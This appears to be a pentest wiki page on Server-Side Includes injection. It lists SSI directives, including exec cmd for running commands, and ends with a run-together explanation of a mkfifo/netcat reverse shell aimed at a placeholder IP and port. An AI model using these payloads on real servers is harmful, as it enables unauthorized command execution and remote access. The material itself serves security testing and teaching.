SSI
Server-Side Includes.
Server-side includes is a technology used by web applications to create dynamic content on HTML pages before loading or during the rendering process by evaluating SSI directives. SSI directives are not always present in modern web servers and are not a standard feature of all servers. There are web servers that support SSI directives and others that do not. However, many popular web servers such as Apache, Nginx and Microsoft IIS support SSI directives and provide features to enable and configure them. The use of SSI on a web application can be identified by checking extensions such as .shtml, .shtm, or .stm. That said, there are non-default server configurations that may allow other extensions (such as .html) to process SSI directives.
SSI directives are enclosed between the tags <!--# and -->.
Date
<!--#echo var="DATE_LOCAL" -->
Modification date of a file
<!--#flastmod file="index.html" -->
CGI Program results
<!--#include virtual="/cgi-bin/counter.pl" -->
Including a footer
<!--#include virtual="/footer.html" -->
Executing commands
<!--#exec cmd="ls" -->
Setting variables
<!--#set var="name" value="Rich" -->
Including virtual files (same directory)
<!--#include virtual="file_to_include.html" -->
Including files (same directory)
<!--#include file="file_to_include.html" -->
Print all variables
<!--#printenv -->
Reverse Shell
mkfifo /tmp/foo: Create a FIFO special file in/tmp/foonc <IP> <PORT> 0</tmp/foo: Connect to the my machine and redirect the standard input descriptor| bin/bash 1>/tmp/foo: Execute/bin/bashredirecting the standard output descriptor to/tmp/foorm /tmp/foo: Cleanup the FIFO file
Last updated
Was this helpful?